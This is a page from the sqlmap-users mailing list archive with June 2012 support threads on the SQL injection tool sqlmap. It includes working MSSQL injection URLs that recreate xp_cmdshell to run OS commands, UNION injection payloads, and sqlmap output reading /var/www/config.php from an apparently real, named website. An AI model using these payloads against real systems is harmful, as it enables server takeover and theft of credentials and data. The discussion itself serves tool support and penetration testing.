sqlmap-users Mailing List for sqlmap (Page 58)
Brought to you by:
inquisb
You can subscribe to this list here.
2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
From: Anton S. <hy...@ef...> - 2012-06-18 15:26:14
|
Hello everyone, I have an application that is injectable using the 'x-forwarded-for' custom HTTP header. While I can specify it with --headers, I can't seem to find a way to use it as an injection point: C:\sqlmap>python sqlmap.py -u "http://www.example.com/index.php" --headers "x-for warded-for: 1" --level 5 --risk 3 --dbms mysql --threads 10 -p "x-forwarded-for" sqlmap/1.0-dev (r5112) - automatic SQL injection and database takeover tool http://www.sqlmap.org [10:50:04] [CRITICAL] all testable parameters you provided are not present within the GET, POST and Cookie parameters Is that expected behavior or am I missing something? Thank you, Anton |
From: Adi M. <adi...@ya...> - 2012-06-18 13:22:23
|
The idea was that I wanted to introduce a time delay.....which did not happen. ________________________________ From: Johnny Venter <Joh...@zo...> To: Adi Mutu <adi...@ya...> Cc: Miroslav Stampar <mir...@gm...>; "sql...@li..." <sql...@li...> Sent: Monday, June 18, 2012 4:05 PM Subject: Re: [sqlmap-users] re-create xp_cmdshell If you want to verify using network connectivity commands like ping, make sure you have access to a public IP and set wireshark on that box and listen for an ICMP connection from your target. On Jun 18, 2012, at 6:59 AM, Adi Mutu wrote: No problem. > > >Thanks, that worked, executed without error, however i still can't execute code. >I've added ; exec xp_cmdshell 'ping -n 30 www.yahoo.com';-- >but nothing, no delay. > > > >________________________________ > From: Miroslav Stampar <mir...@gm...> >To: Adi Mutu <adi...@ya...> >Cc: "sql...@li..." <sql...@li...> >Sent: Monday, June 18, 2012 1:38 PM >Subject: Re: [sqlmap-users] re-create xp_cmdshell > > >My bad. > > >I've thought that the problem is trivial :) > > >This is the right way how to do it: >http://www.target.com/vuln.asp?id=1;DECLARE @abc nvarchar(999); SET @abc='CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'', @ID OUT EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 EXEC sp_OADestroy @ID'; EXEC master..sp_executesql @abc;-- >(https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/takeover/xp_cmdshell.py) > > >That way you are bypassing that "syntax" obstacle by using a stored procedure master..sp_executesql to do it for you > > >Kind regards, >Miroslav Stampar > > >On Mon, Jun 18, 2012 at 11:24 AM, Miroslav Stampar <mir...@gm...> wrote: > >Hi Adi. >> >> >>This means that CREATE PROCEDURE has to be used right after the semi-colon (;) sign. >> >> >>So, if you have a SELECT SQLi case like: >>SELECT * FROM users WHERE id=$_GET['id'] >> >> >>you would need to inject into it something like: >>http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE.. >> >> >>As you are probably using "recreate steps" from https://www.owasp.org/index.php/Testing_for_SQL_Server, this would mean that you would need to inject: >>http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS%0aDECLARE @result int, @OLEResult int, @RunResult int%0a.... >> >>Kind regards, >>Miroslav Stampar >> >> >>On Mon, Jun 18, 2012 at 10:59 AM, Adi Mutu <adi...@ya...> wrote: >> >> >>> >>>Hello, >>> >>> >>>I have a mssql 2000 sql injection in a pentest, i try to recreate xp_cmdshell and i get this: >>> >>> >>>'CREATE PROCEDURE' must be the first statement in a query batch. >>> >>> >>> >>>Anybody has any idea about this behavious and if it can be done something about this? >>> >>> >>>Thanks >>> >>> >>>------------------------------------------------------------------------------ >>>Live Security Virtual Conference >>>Exclusive live event will cover all the ways today's security and >>>threat landscape has changed and how IT managers can respond. Discussions >>>will include endpoint security, mobile security and the latest in malware >>>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >>>_______________________________________________ >>>sqlmap-users mailing list >>>sql...@li... >>>https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> >>-- >>Miroslav Stampar >>http://about.me/stamparm >> > > > >-- >Miroslav Stampar >http://about.me/stamparm > > >------------------------------------------------------------------------------ >Live Security Virtual Conference >Exclusive live event will cover all the ways today's security and >threat landscape has changed and how IT managers can respond. Discussions >will include endpoint security, mobile security and the latest in malware >threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/_______________________________________________ >sqlmap-users mailing list >sql...@li... >https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
From: Johnny V. <Joh...@zo...> - 2012-06-18 13:05:08
|
If you want to verify using network connectivity commands like ping, make sure you have access to a public IP and set wireshark on that box and listen for an ICMP connection from your target. On Jun 18, 2012, at 6:59 AM, Adi Mutu wrote: > No problem. > > Thanks, that worked, executed without error, however i still can't execute code. > I've added ; exec xp_cmdshell 'ping -n 30 www.yahoo.com';-- > but nothing, no delay. > > From: Miroslav Stampar <mir...@gm...> > To: Adi Mutu <adi...@ya...> > Cc: "sql...@li..." <sql...@li...> > Sent: Monday, June 18, 2012 1:38 PM > Subject: Re: [sqlmap-users] re-create xp_cmdshell > > My bad. > > I've thought that the problem is trivial :) > > This is the right way how to do it: > http://www.target.com/vuln.asp?id=1;DECLARE @abc nvarchar(999); SET @abc='CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'', @ID OUT EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 EXEC sp_OADestroy @ID'; EXEC master..sp_executesql @abc;-- > (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/takeover/xp_cmdshell.py) > > That way you are bypassing that "syntax" obstacle by using a stored procedure master..sp_executesql to do it for you > > Kind regards, > Miroslav Stampar > > On Mon, Jun 18, 2012 at 11:24 AM, Miroslav Stampar <mir...@gm...> wrote: > Hi Adi. > > This means that CREATE PROCEDURE has to be used right after the semi-colon (;) sign. > > So, if you have a SELECT SQLi case like: > SELECT * FROM users WHERE id=$_GET['id'] > > you would need to inject into it something like: > http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE.. > > As you are probably using "recreate steps" from https://www.owasp.org/index.php/Testing_for_SQL_Server, this would mean that you would need to inject: > http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS%0aDECLARE @result int, @OLEResult int, @RunResult int%0a.... > > Kind regards, > Miroslav Stampar > > On Mon, Jun 18, 2012 at 10:59 AM, Adi Mutu <adi...@ya...> wrote: > > Hello, > > I have a mssql 2000 sql injection in a pentest, i try to recreate xp_cmdshell and i get this: > > 'CREATE PROCEDURE' must be the first statement in a query batch. > > Anybody has any idea about this behavious and if it can be done something about this? > > Thanks > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/_______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
From: Adi M. <adi...@ya...> - 2012-06-18 10:59:50
|
No problem. Thanks, that worked, executed without error, however i still can't execute code. I've added ; exec xp_cmdshell 'ping -n 30 www.yahoo.com';-- but nothing, no delay. ________________________________ From: Miroslav Stampar <mir...@gm...> To: Adi Mutu <adi...@ya...> Cc: "sql...@li..." <sql...@li...> Sent: Monday, June 18, 2012 1:38 PM Subject: Re: [sqlmap-users] re-create xp_cmdshell My bad. I've thought that the problem is trivial :) This is the right way how to do it: http://www.target.com/vuln.asp?id=1;DECLARE @abc nvarchar(999); SET @abc='CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'', @ID OUT EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 EXEC sp_OADestroy @ID'; EXEC master..sp_executesql @abc;-- (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/takeover/xp_cmdshell.py) That way you are bypassing that "syntax" obstacle by using a stored procedure master..sp_executesql to do it for you Kind regards, Miroslav Stampar On Mon, Jun 18, 2012 at 11:24 AM, Miroslav Stampar <mir...@gm...> wrote: Hi Adi. > > >This means that CREATE PROCEDURE has to be used right after the semi-colon (;) sign. > > >So, if you have a SELECT SQLi case like: >SELECT * FROM users WHERE id=$_GET['id'] > > >you would need to inject into it something like: >http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE.. > > >As you are probably using "recreate steps" from https://www.owasp.org/index.php/Testing_for_SQL_Server, this would mean that you would need to inject: >http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS%0aDECLARE @result int, @OLEResult int, @RunResult int%0a.... > >Kind regards, >Miroslav Stampar > > >On Mon, Jun 18, 2012 at 10:59 AM, Adi Mutu <adi...@ya...> wrote: > > >> >>Hello, >> >> >>I have a mssql 2000 sql injection in a pentest, i try to recreate xp_cmdshell and i get this: >> >> >>'CREATE PROCEDURE' must be the first statement in a query batch. >> >> >> >>Anybody has any idea about this behavious and if it can be done something about this? >> >> >>Thanks >> >> >>------------------------------------------------------------------------------ >>Live Security Virtual Conference >>Exclusive live event will cover all the ways today's security and >>threat landscape has changed and how IT managers can respond. Discussions >>will include endpoint security, mobile security and the latest in malware >>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >>_______________________________________________ >>sqlmap-users mailing list >>sql...@li... >>https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > >-- >Miroslav Stampar >http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-06-18 10:38:26
|
My bad. I've thought that the problem is trivial :) This is the right way how to do it: http://www.target.com/vuln.asp?id=1;DECLARE @abc nvarchar(999); SET @abc='CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'', @ID OUT EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 EXEC sp_OADestroy @ID'; EXEC master..sp_executesql @abc;-- (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/takeover/xp_cmdshell.py) That way you are bypassing that "syntax" obstacle by using a stored procedure master..sp_executesql to do it for you Kind regards, Miroslav Stampar On Mon, Jun 18, 2012 at 11:24 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi Adi. > > This means that CREATE PROCEDURE has to be used right after the semi-colon > (;) sign. > > So, if you have a SELECT SQLi case like: > SELECT * FROM users WHERE id=$_GET['id'] > > you would need to inject into it something like: > http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE.. > > As you are probably using "recreate steps" from > https://www.owasp.org/index.php/Testing_for_SQL_Server, this would mean > that you would need to inject: > http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE xp_cmdshell(@cmd > varchar(255), @Wait int = 0) AS%0aDECLARE @result int, @OLEResult int, > @RunResult int%0a.... > > Kind regards, > Miroslav Stampar > > On Mon, Jun 18, 2012 at 10:59 AM, Adi Mutu <adi...@ya...> wrote: > >> >> Hello, >> >> I have a mssql 2000 sql injection in a pentest, i try to recreate >> xp_cmdshell and i get this: >> >> 'CREATE PROCEDURE' must be the first statement in a query batch. >> >> Anybody has any idea about this behavious and if it can be done something >> about this? >> >> Thanks >> >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-06-18 09:24:37
|
Hi Adi. This means that CREATE PROCEDURE has to be used right after the semi-colon (;) sign. So, if you have a SELECT SQLi case like: SELECT * FROM users WHERE id=$_GET['id'] you would need to inject into it something like: http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE.. As you are probably using "recreate steps" from https://www.owasp.org/index.php/Testing_for_SQL_Server, this would mean that you would need to inject: http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS%0aDECLARE @result int, @OLEResult int, @RunResult int%0a.... Kind regards, Miroslav Stampar On Mon, Jun 18, 2012 at 10:59 AM, Adi Mutu <adi...@ya...> wrote: > > Hello, > > I have a mssql 2000 sql injection in a pentest, i try to recreate > xp_cmdshell and i get this: > > 'CREATE PROCEDURE' must be the first statement in a query batch. > > Anybody has any idea about this behavious and if it can be done something > about this? > > Thanks > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Adi M. <adi...@ya...> - 2012-06-18 09:02:10
|
Hello, I have a mssql 2000 sql injection in a pentest, i try to recreate xp_cmdshell and i get this: 'CREATE PROCEDURE' must be the first statement in a query batch. Anybody has any idea about this behavious and if it can be done something about this? Thanks |
From: Miroslav S. <mir...@gm...> - 2012-06-16 19:35:12
|
Hi Bob. Could you please send one of those problematic retrieved files? Also, traffic file would be nice (just append -t traffic.txt to a normal run) Kind regards, Miroslav Stampar On Jun 16, 2012 10:51 AM, "Bob" <sto...@qq...> wrote: > Hi all , > > i use file-read to retrieve file on server . > > /etc/passwd can workable > > but others response is as followed . > > 16:44:14] [INFO] resuming back-end DBMS 'mysql 5' from session file > [16:44:14] [INFO] testing connection to the target url > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: su_sd > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause (Generic > comment) > Payload: Fai=&SU=&nw=&su_sd=%' AND 5207=5207-- &pe=650 > > Type: UNION query > Title: MySQL UNION query (NULL) - 17 columns > Payload: Fai=&SU=&nw=&su_sd=%' LIMIT 1,1 UNION ALL SELECT NULL, > CONCAT(0x3a7a66623a,0x5a546342474b66515343,0x3a777a663a), NULL, NULL, NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, > NULL#&pe=650 > --- > > [16:44:16] [INFO] the back-end DBMS is MySQL > [16:44:16] [INFO] fetching banner > web server operating system: Linux Fedora 15 (Lovelock) > web application technology: PHP 5.3.8, Apache 2.2.17 > back-end DBMS: MySQL 5 > banner: '5.1.60' > > [16:44:16] [INFO] fingerprinting the back-end DBMS operating system > [16:44:16] [INFO] the back-end DBMS operating system is Linux > [16:44:16] [INFO] fetching file: '/var/www/config.php' > [16:44:16] [ERROR] for some reason(s) sqlmap retrieved an odd-length > hexadecimal string which it is not able to convert to raw string > /var/www/config.php file saved to: '/pentest/database/sqlmap/output/ > www.kangyang.com.tw/files/_var_www_config.php' > > [16:44:16] [INFO] fetched data logged to text files under > '/pentest/database/sqlmap/output/www.kangyang.com.tw' > > [*] shutting down at 16:44:16 > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
From: Shadow F. <sha...@gm...> - 2012-06-16 08:57:51
|
[01:03:40] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r5127), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev (r5127) Python version: 2.6.5 Operating system: posix Command line: ./sqlmap.py -u ****************************************************************************************************************************************************** --tor --random-agent -p hLids --technique=U -v 3 --current-user Technique: UNION Back-end DBMS: MySQL (fingerprinted) Traceback (most recent call last): File "/pentest/database/sqlmap/_sqlmap.py", line 81, in main start() File "/pentest/database/sqlmap/lib/controller/controller.py", line 573, in start action() File "/pentest/database/sqlmap/lib/controller/action.py", line 64, in action conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser()) File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 138, in getCurrentUser kb.data.currentUser = unArrayizeValue(inject.getValue(query)) File "/pentest/database/sqlmap/lib/request/inject.py", line 418, in getValue value = __goInband(query, expected, unpack, dump) File "/pentest/database/sqlmap/lib/request/inject.py", line 365, in __goInband output = unionUse(expression, unpack=unpack, dump=dump) File "/pentest/database/sqlmap/lib/techniques/union/use.py", line 343, in unionUse value = __oneShotUnionUse(expression, unpack) File "/pentest/database/sqlmap/lib/techniques/union/use.py", line 69, in __oneShotUnionUse kb.unionDuplicates = vector[7] IndexError: tuple index out of range |
From: B. <sto...@qq...> - 2012-06-16 08:51:12
|
Hi all , i use file-read to retrieve file on server . /etc/passwd can workable but others response is as followed . 16:44:14] [INFO] resuming back-end DBMS 'mysql 5' from session file [16:44:14] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: su_sd Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (Generic comment) Payload: Fai=&SU=&nw=&su_sd=%' AND 5207=5207-- &pe=650 Type: UNION query Title: MySQL UNION query (NULL) - 17 columns Payload: Fai=&SU=&nw=&su_sd=%' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7a66623a,0x5a546342474b66515343,0x3a777a663a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&pe=650 --- [16:44:16] [INFO] the back-end DBMS is MySQL [16:44:16] [INFO] fetching banner web server operating system: Linux Fedora 15 (Lovelock) web application technology: PHP 5.3.8, Apache 2.2.17 back-end DBMS: MySQL 5 banner: '5.1.60' [16:44:16] [INFO] fingerprinting the back-end DBMS operating system [16:44:16] [INFO] the back-end DBMS operating system is Linux [16:44:16] [INFO] fetching file: '/var/www/config.php' [16:44:16] [ERROR] for some reason(s) sqlmap retrieved an odd-length hexadecimal string which it is not able to convert to raw string /var/www/config.php file saved to: '/pentest/database/sqlmap/output/www.kangyang.com.tw/files/_var_www_config.php' [16:44:16] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.kangyang.com.tw' [*] shutting down at 16:44:16 |
From: Miroslav S. <mir...@gm...> - 2012-06-14 14:16:44
|
Find it unhidden with the latest r5123. Kind regards On Thu, Jun 14, 2012 at 3:51 PM, Miroslav Stampar < mir...@gm...> wrote: > Ok. Cool :) > > We'll most probably unhide that switch these days as it's a quite usable > one > > Kind regards > > > On Thu, Jun 14, 2012 at 3:49 PM, Yori Kvitchko < > yo...@co...> wrote: > >> Miroslav, >> >> It looks like --test-filter is what I need. I don't need a custom suffix >> and prefix, I just need to force sqlmap to use a specific test it already >> has in its collection of payloads.xml and only that test. If I can use >> test-filter to select exactly the test I need and sqlmap will only use that >> one, then I think my needs are filled. >> >> Much appreciated. >> >> - Yori >> >> On 6/13/2012 6:42 PM, Miroslav Stampar wrote: >> >> Hi Yori. >> >> "With that in mind it makes sense to be able to specify a test/payload >> combination that you have found and you know is working." >> >> We already have two mechanisms for such thing: >> 1) --prefix/--suffix where you can specify what are the prefix and suffix >> of SQL injection vector (e.g. --prefix="'" --suffix="-- " ) >> 2) --test-filter (hidden this moment) where you can target a specific >> test by it's name or payload (e.g. --test-filter="ROW" would trigger MySQL >> error-based injection test based on old ROW(..,..)>... technique) >> >> Now, please, if you have something other on your mind please tell so we >> could discuss and maybe find some other mechanism (if those 2 don't satisfy >> your needs) >> >> Kind regards, >> Miroslav Stampar >> >> On Wed, Jun 13, 2012 at 10:19 PM, Yori Kvitchko < >> yo...@co...> wrote: >> >>> Hey Everyone, >>> >>> New to the list but have been using sqlmap for a while now. I recently >>> participated in a CTF with an interesting blind, filter bypass sql >>> injection. Lots of restrictions. I set a challenge for myself to solve >>> it using sqlmap and managed to get it working with some effort. Of the >>> changes I had to make to get it to work included modifications to >>> queries.xml as well as specific arguments, but most of what I'm going to >>> request here is about payloads.xml. >>> >>> In trying to solve the challenge, I realized I needed to make sqlmap >>> laser focus on a single test. This was both for false negative >>> reduction, number of queries sent, and time limit. I did this myself by >>> removing every other test from payloads.xml but it brought to mind the >>> idea of being able to specify a test via command line arguments. You can >>> specify pretty much everything else on the command line, so the added >>> granularity would be nice. >>> >>> My philosophy on sql injection is that testing for it should be done >>> manually, then once found, get a tool like sqlmap to work with it and >>> perform all the time consuming brute forcing work for you. With that in >>> mind it makes sense to be able to specify a test/payload combination >>> that you have found and you know is working. >>> >>> Thanks for your consideration. Excellent work on the tool. >>> >>> - Yori >>> >>> >>> ------------------------------------------------------------------------------ >>> Live Security Virtual Conference >>> Exclusive live event will cover all the ways today's security and >>> threat landscape has changed and how IT managers can respond. Discussions >>> will include endpoint security, mobile security and the latest in malware >>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-06-14 13:51:20
|
Ok. Cool :) We'll most probably unhide that switch these days as it's a quite usable one Kind regards On Thu, Jun 14, 2012 at 3:49 PM, Yori Kvitchko < yo...@co...> wrote: > Miroslav, > > It looks like --test-filter is what I need. I don't need a custom suffix > and prefix, I just need to force sqlmap to use a specific test it already > has in its collection of payloads.xml and only that test. If I can use > test-filter to select exactly the test I need and sqlmap will only use that > one, then I think my needs are filled. > > Much appreciated. > > - Yori > > On 6/13/2012 6:42 PM, Miroslav Stampar wrote: > > Hi Yori. > > "With that in mind it makes sense to be able to specify a test/payload > combination that you have found and you know is working." > > We already have two mechanisms for such thing: > 1) --prefix/--suffix where you can specify what are the prefix and suffix > of SQL injection vector (e.g. --prefix="'" --suffix="-- " ) > 2) --test-filter (hidden this moment) where you can target a specific test > by it's name or payload (e.g. --test-filter="ROW" would trigger MySQL > error-based injection test based on old ROW(..,..)>... technique) > > Now, please, if you have something other on your mind please tell so we > could discuss and maybe find some other mechanism (if those 2 don't satisfy > your needs) > > Kind regards, > Miroslav Stampar > > On Wed, Jun 13, 2012 at 10:19 PM, Yori Kvitchko < > yo...@co...> wrote: > >> Hey Everyone, >> >> New to the list but have been using sqlmap for a while now. I recently >> participated in a CTF with an interesting blind, filter bypass sql >> injection. Lots of restrictions. I set a challenge for myself to solve >> it using sqlmap and managed to get it working with some effort. Of the >> changes I had to make to get it to work included modifications to >> queries.xml as well as specific arguments, but most of what I'm going to >> request here is about payloads.xml. >> >> In trying to solve the challenge, I realized I needed to make sqlmap >> laser focus on a single test. This was both for false negative >> reduction, number of queries sent, and time limit. I did this myself by >> removing every other test from payloads.xml but it brought to mind the >> idea of being able to specify a test via command line arguments. You can >> specify pretty much everything else on the command line, so the added >> granularity would be nice. >> >> My philosophy on sql injection is that testing for it should be done >> manually, then once found, get a tool like sqlmap to work with it and >> perform all the time consuming brute forcing work for you. With that in >> mind it makes sense to be able to specify a test/payload combination >> that you have found and you know is working. >> >> Thanks for your consideration. Excellent work on the tool. >> >> - Yori >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > -- Miroslav Stampar http://about.me/stamparm |
From: Yori K. <yo...@co...> - 2012-06-14 13:50:05
|
Miroslav, It looks like --test-filter is what I need. I don't need a custom suffix and prefix, I just need to force sqlmap to use a specific test it already has in its collection of payloads.xml and only that test. If I can use test-filter to select exactly the test I need and sqlmap will only use that one, then I think my needs are filled. Much appreciated. - Yori On 6/13/2012 6:42 PM, Miroslav Stampar wrote: > Hi Yori. > > "With that in mind it makes sense to be able to specify a test/payload > combination that you have found and you know is working." > > We already have two mechanisms for such thing: > 1) --prefix/--suffix where you can specify what are the prefix and > suffix of SQL injection vector (e.g. --prefix="'" --suffix="-- " ) > 2) --test-filter (hidden this moment) where you can target a specific > test by it's name or payload (e.g. --test-filter="ROW" would trigger > MySQL error-based injection test based on old ROW(..,..)>... technique) > > Now, please, if you have something other on your mind please tell so > we could discuss and maybe find some other mechanism (if those 2 don't > satisfy your needs) > > Kind regards, > Miroslav Stampar > > On Wed, Jun 13, 2012 at 10:19 PM, Yori Kvitchko > <yo...@co... > <mailto:yo...@co...>> wrote: > > Hey Everyone, > > New to the list but have been using sqlmap for a while now. I recently > participated in a CTF with an interesting blind, filter bypass sql > injection. Lots of restrictions. I set a challenge for myself to solve > it using sqlmap and managed to get it working with some effort. Of the > changes I had to make to get it to work included modifications to > queries.xml as well as specific arguments, but most of what I'm > going to > request here is about payloads.xml. > > In trying to solve the challenge, I realized I needed to make sqlmap > laser focus on a single test. This was both for false negative > reduction, number of queries sent, and time limit. I did this > myself by > removing every other test from payloads.xml but it brought to mind the > idea of being able to specify a test via command line arguments. > You can > specify pretty much everything else on the command line, so the added > granularity would be nice. > > My philosophy on sql injection is that testing for it should be done > manually, then once found, get a tool like sqlmap to work with it and > perform all the time consuming brute forcing work for you. With > that in > mind it makes sense to be able to specify a test/payload combination > that you have found and you know is working. > > Thanks for your consideration. Excellent work on the tool. > > - Yori > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. > Discussions > will include endpoint security, mobile security and the latest in > malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm |
From: jing f. <fen...@me...> - 2012-06-14 00:55:09
|
